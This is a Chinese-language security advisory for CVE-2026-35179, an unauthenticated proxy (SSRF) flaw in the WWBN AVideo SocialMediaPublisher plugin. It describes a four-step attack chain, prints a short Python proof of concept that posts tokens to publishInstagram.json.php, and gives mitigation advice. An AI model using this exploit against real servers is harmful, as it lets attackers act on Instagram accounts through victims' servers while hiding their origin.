CVE-2026-35179 CVSS 5.3 中危

CVE-2026-35179 AVideo未授权代理漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35179

漏洞类型

SSRF (服务端请求伪造)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo开源视频平台在26.0及之前版本中存在安全漏洞。其SocialMediaPublisher插件暴露的端点充当了未授权的Facebook/Instagram Graph API代理。未经身份认证的攻击者可通过该服务器向Graph API发送任意请求，利用被窃取的令牌或滥用平台自身的凭证，造成数据泄露或完整性破坏。

技术细节

该漏洞源于WWBN AVideo的SocialMediaPublisher插件在处理Instagram发布请求时，未对访问来源进行严格的身份验证。漏洞核心在于`publishInstagram.json.php`文件，该接口直接接收用户提交的`access_token`、`container_id`和`ig_account_id`等参数，并将其传递给后端的`InstagramUploader::publishMediaIfIsReady()`方法。由于缺乏必要的权限校验，攻击者无需登录系统即可构造恶意请求。攻击者通过发送特制的HTTP请求，将窃取的有效Graph API令牌或利用服务器自身的凭证注入请求中。服务器随后充当代理角色，将请求转发至Facebook/Instagram的API服务器。利用此漏洞，攻击者可以隐藏真实IP，利用受害服务器的信誉对Instagram账户进行操作，包括发布内容、查询数据等。

攻击链分析

STEP 1

信息收集

攻击者识别出目标正在使用WWBN AVideo平台，且版本号在26.0及以下。

STEP 2

漏洞探测

攻击者访问SocialMediaPublisher插件路径，确认`publishInstagram.json.php`端点存在且无需认证即可访问。

STEP 3

构造 payload

攻击者准备包含恶意或窃取的`access_token`、`container_id`等参数的HTTP POST请求。

STEP 4

执行攻击

攻击者发送请求至目标服务器，服务器作为代理将请求转发至Facebook/Instagram Graph API执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-35179: Unauthenticated Proxy in AVideo
import requests

def exploit_poc(target_url):
    # The vulnerable endpoint
    endpoint = f"{target_url}/plugin/SocialMediaPublisher/publishInstagram.json.php"
    
    # Malicious payload parameters to be proxied
    # An attacker would use a stolen token or test with the server's own credentials
    data = {
        "access_token": "EAABwzLixnjYBAO...",  # Example token
        "container_id": "123456789",
        "ig_account_id": "987654321"
    }
    
    try:
        print(f"[*] Sending request to {endpoint}...")
        response = requests.post(endpoint, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully via proxy.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    exploit_poc(target)

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议管理员暂时禁用SocialMediaPublisher插件，或通过WAF/防火墙规则拦截对`publishInstagram.json.php`路径的外部访问请求，仅允许信任的内部IP调用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表